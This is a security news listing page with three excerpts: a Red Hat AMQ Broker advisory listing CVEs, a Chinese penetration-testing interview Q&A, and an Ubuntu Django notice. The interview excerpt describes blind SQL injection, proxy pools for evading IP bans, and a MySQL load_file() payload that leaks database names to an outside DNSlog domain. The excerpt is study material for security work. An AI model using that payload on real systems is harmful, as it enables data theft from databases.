Category CERT-LatestNews Database Management Systems ThreatsCybercrime VulnerabilitiesAll VulnerabilitiesApplications VulnerabilitiesDBMS VulnerabilitiesFirmware VulnerabilitiesLinux VulnerabilitiesNetwork VulnerabilitiesOracle

Multiple vulnerabilities in Red Hat AMQ Broker

March 27, 2020
Severity Medium Patch available YES Number of vulnerabilities 14 CVE ID CVE-2019-0222CVE-2019-9511CVE-2019-9512CVE-2019-9514CVE-2019-9515CVE-2019-9516CVE-2019-9517CVE-2019-9518CVE-2019-10241CVE-2019-10247CVE-2019-16869CVE-2019-20444CVE-2019-20445CVE-2020-7238 CWE ID CWE-400CWE-399CWE-79CWE-20CWE-444CWE-113...
Tags , , , , , , , , ,
Read More
Category Applications VulnerabilitiesAll VulnerabilitiesApplications VulnerabilitiesCrypto VulnerabilitiesDBMS VulnerabilitiesGoogle VulnerabilitiesMicrosoft VulnerabilitiesNetwork VulnerabilitiesOracle

渗透测试面试近期热门题

March 24, 2020
(1)没有回显的情况下,一般编写脚本,进行自动化注入。但与此同时,由于防火墙的存在,容易被封禁IP,可以尝试调整请求频率,有条件的使用代理池进行请求。 (2)此时也可以使用 DNSlog 注入,原理就是把服务器返回的结果放在域名中,然后读取 DNS 解析时的日志,来获取想要的信息。 (3)Mysql 中利用 load_file() 构造payload. ‘ and if((select load_file(concat(‘\\’,(select database()),’.xxx.ceye.io\abc’))),1,0)#...
Tags , , , , , , , , ,
Read More
vamtam-theme-circle-post
Category Database Management Systems VulnerabilitiesAll VulnerabilitiesDBMS VulnerabilitiesLinux VulnerabilitiesOracle VulnerabilitiesOS

Ubuntu 4296-1: Django vulnerability>

March 4, 2020
Django could allow unintended access to the database. ========================================================================== Ubuntu Security Notice USN-4296-1 March 04,...
Tags , , , , , ,
Read More
Page 1 of 31 2 3